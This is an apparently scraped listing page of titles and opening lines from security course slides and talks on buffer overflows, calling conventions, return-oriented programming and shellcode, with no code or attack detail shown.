HW 8 CS681 & CS392 Computer Security Understanding and Experimenting with Memory Corruption Vulnerabilities DUE 12/18/2005 HW 8 CS681 & CS392 Computer Security Understanding and Experimenting with Memory Corruption Vulnerabilities 1 Motivation DUE 12/18/2005 Memory corruption vulnerabilities to change program execution flow

More information

Function Call Convention

Function Call Convention Function Call Convention Compass Security Schweiz AG Werkstrasse 20 Postfach 2038 CH-8645 Jona Tel +41 55 214 41 60 Fax +41 55 214 41 61 team@csnc.ch www.csnc.ch Content Intel Architecture Memory Layout

More information

Overflows, Injection, & Memory Safety

Overflows, Injection, & Memory Safety Overflows, Injection, & Memory Safety 1 Announcements... Computer Science 161 Fall 2018 Project 1 is now live! Due Friday September 14th Start it early: The add/drop deadline got reduced to September 12th

More information

ROP It Like It s Hot!

ROP It Like It s Hot! Wednesday, December 3, 14 2014 Red Canari, Inc. All rights reserved. 1 I N F O R M AT I O N S E C U R I T Y ROP It Like It s Hot! A 101 on Buffer Overflows, Return Oriented Programming, & Shell- code Development

More information

Is Exploitation Over? Bypassing Memory Protections in Windows 7

Is Exploitation Over? Bypassing Memory Protections in Windows 7 Is Exploitation Over? Bypassing Memory Protections in Windows 7 Alexander Sotirov alex@sotirov.net About me Exploit development since 1999 Published research into reliable exploitation techniques: Heap

More information

CMSC 414 Computer and Network Security

CMSC 414 Computer and Network Security CMSC 414 Computer and Network Security Buffer Overflows Dr. Michael Marsh August 30, 2017 Trust and Trustworthiness You read: Reflections on Trusting Trust (Ken Thompson), 1984 Smashing the Stack for Fun

More information

Return-orientated Programming

Return-orientated Programming Return-orientated Programming or The Geometry of Innocent Flesh on the Bone: Return-into-libc without Function Calls (on the x86) Hovav Shacham, CCS '07 Return-Oriented oriented Programming programming

More information

CS 161 Computer Security

CS 161 Computer Security Paxson Spring 2011 CS 161 Computer Security Discussion 1 January 26, 2011 Question 1 Buffer Overflow Mitigations Buffer overflow mitigations generally fall into two categories: (i) eliminating the cause

More information

Buffer-Overflow Attacks on the Stack

Buffer-Overflow Attacks on the Stack Computer Systems Buffer-Overflow Attacks on the Stack Introduction A buffer overflow occurs when a program, while writing data to a buffer, overruns the buffer's boundary and overwrites memory in adjacent

More information

Is stack overflow still a problem?

Is stack overflow still a problem? Morris Worm (1998) Code Red (2001) Secure Programming Lecture 4: Memory Corruption II (Stack Overflows) David Aspinall, Informatics @ Edinburgh 31st January 2017 Memory corruption Buffer overflow remains

More information

Assembly Language: Function Calls

Assembly Language: Function Calls Assembly Language: Function Calls 1 Goals of this Lecture Help you learn: Function call problems: Calling and returning Passing parameters Storing local variables Handling registers without interference

More information

Buffer Overflow Vulnerability

Buffer Overflow Vulnerability Buffer Overflow Vulnerability 1 Buffer Overflow Vulnerability Copyright c 2006 2014 Wenliang Du, Syracuse University. The development of this document is/was funded by three grants from the US National

More information

Native Language Exploitation

Native Language Exploitation Native Language Exploitation András Gazdag CrySyS Lab, BME www.crysys.hu 2017 CrySyS Lab Memory errors and corruption Memory error vulnerabilities are created by programmers and exploited by attackers

More information

Advanced Buffer Overflow

Advanced Buffer Overflow Pattern Recognition and Applications Lab Advanced Buffer Overflow Ing. Davide Maiorca, Ph.D. davide.maiorca@diee.unica.it Computer Security A.Y. 2017/2018 Department of Electrical and Electronic Engineering

More information

Robust Shell Code Return Oriented Programming and HeapSpray. Zhiqiang Lin

Robust Shell Code Return Oriented Programming and HeapSpray. Zhiqiang Lin CS 6V81-05: System Security and Malicious Code Analysis Robust Shell Code Return Oriented Programming and HeapSpray Zhiqiang Lin Department of Computer Science University of Texas at Dallas April 16 th,

More information

Assembly Language: Function Calls" Goals of this Lecture"

Assembly Language: Function Calls Goals of this Lecture Assembly Language: Function Calls" 1 Goals of this Lecture" Help you learn:" Function call problems:" Calling and returning" Passing parameters" Storing local variables" Handling registers without interference"

More information

Reserve Engineering & Buffer Overflow Attacks. Tom Chothia Computer Security, Lecture 17

Reserve Engineering & Buffer Overflow Attacks. Tom Chothia Computer Security, Lecture 17 Reserve Engineering & Buffer Overflow Attacks Tom Chothia Computer Security, Lecture 17 Introduction A simplified, high-level view of buffer overflow attacks. x86 architecture overflows on the stack Some

More information

18-600: Recitation #4 Exploits (Attack Lab)

18-600: Recitation #4 Exploits (Attack Lab) 18-600: Recitation #4 Exploits (Attack Lab) September 19th, 2017 Announcements Some students have triggered the bomb multiple times Use breakpoints for explode_bomb() Attack lab will be released on Sep.

More information

BUFFER OVERFLOW. Jo, Heeseung

BUFFER OVERFLOW. Jo, Heeseung BUFFER OVERFLOW Jo, Heeseung IA-32/LINUX MEMORY LAYOUT Heap Runtime stack (8MB limit) Dynamically allocated storage When call malloc(), calloc(), new() DLLs (shared libraries) Data Text Dynamically linked

More information

Buffer Overflow. Jo, Heeseung

Buffer Overflow. Jo, Heeseung Buffer Overflow Jo, Heeseung IA-32/Linux Memory Layout Heap Runtime stack (8MB limit) Dynamically allocated storage When call malloc(), calloc(), new() DLLs (shared libraries) Data Text Dynamically linked

More information

CNIT 127: Exploit Development. Ch 3: Shellcode. Updated

CNIT 127: Exploit Development. Ch 3: Shellcode. Updated CNIT 127: Exploit Development Ch 3: Shellcode Updated 1-30-17 Topics Protection rings Syscalls Shellcode nasm Assembler ld GNU Linker objdump to see contents of object files strace System Call Tracer Removing

More information

Lecture Embedded System Security A. R. Darmstadt, Runtime Attacks

Lecture Embedded System Security A. R. Darmstadt, Runtime Attacks 2 ARM stands for Advanced RISC Machine Application area: Embedded systems Mobile phones, smartphones (Apple iphone, Google Android), music players, tablets, and some netbooks Advantage: Low power consumption

More information

Assembly Language: Function Calls. Goals of this Lecture. Function Call Problems

Assembly Language: Function Calls. Goals of this Lecture. Function Call Problems Assembly Language: Function Calls 1 Goals of this Lecture Help you learn: Function call problems: Calling and urning Passing parameters Storing local variables Handling registers without interference Returning

More information

Assembly Language: Function Calls" Goals of this Lecture"

Assembly Language: Function Calls Goals of this Lecture Assembly Language: Function Calls" 1 Goals of this Lecture" Help you learn:" Function call problems:" Calling and urning" Passing parameters" Storing local variables" Handling registers without interference"

More information

ANITA S SUPER AWESOME RECITATION SLIDES

ANITA S SUPER AWESOME RECITATION SLIDES ANITA S SUPER AWESOME RECITATION SLIDES 15/18-213: Introduction to Computer Systems Stacks and Buflab, 11 Jun 2013 Anita Zhang, Section M WHAT S NEW (OR NOT) Bomblab is due tonight, 11:59 PM EDT Your late

More information

I run a Linux server, so we re secure

I run a Linux server, so we re secure Silent Signal vsza@silentsignal.hu 18 September 2010 Linux from a security viewpoint we re talking about the kernel, not GNU/Linux distributions Linux from a security viewpoint we re talking about the

More information

Lecture 9: Buffer Overflow* CS 392/6813: Computer Security Fall Nitesh Saxena

Lecture 9: Buffer Overflow* CS 392/6813: Computer Security Fall Nitesh Saxena Lecture 9: Buffer Overflow* CS 392/6813: Computer Security Fall 2007 Nitesh Saxena *Adopted from a previous lecture by Aleph One (Smashing the Stack for Fun and Profit) and Stanislav Nurilov Course Admin

More information

Changelog. Corrections made in this version not in first posting: 1 April 2017: slide 13: a few more %c s would be needed to skip format string part

Changelog. Corrections made in this version not in first posting: 1 April 2017: slide 13: a few more %c s would be needed to skip format string part 1 Changelog 1 Corrections made in this version not in first posting: 1 April 2017: slide 13: a few more %c s would be needed to skip format string part OVER questions? 2 last time 3 memory management problems

More information

Architecture-level Security Vulnerabilities. Julian Stecklina

Architecture-level Security Vulnerabilities. Julian Stecklina Architecture-level Security Vulnerabilities Julian Stecklina Outline How stacks work Smashing the stack for fun and profit Preventing stack smashing attacks Circumventing stack smashing prevention The

More information

CSc 466/566. Computer Security. 20 : Operating Systems Application Security

CSc 466/566. Computer Security. 20 : Operating Systems Application Security 1/68 CSc 466/566 Computer Security 20 : Operating Systems Application Security Version: 2014/11/20 13:07:28 Department of Computer Science University of Arizona collberg@gmail.com Copyright c 2014 Christian

More information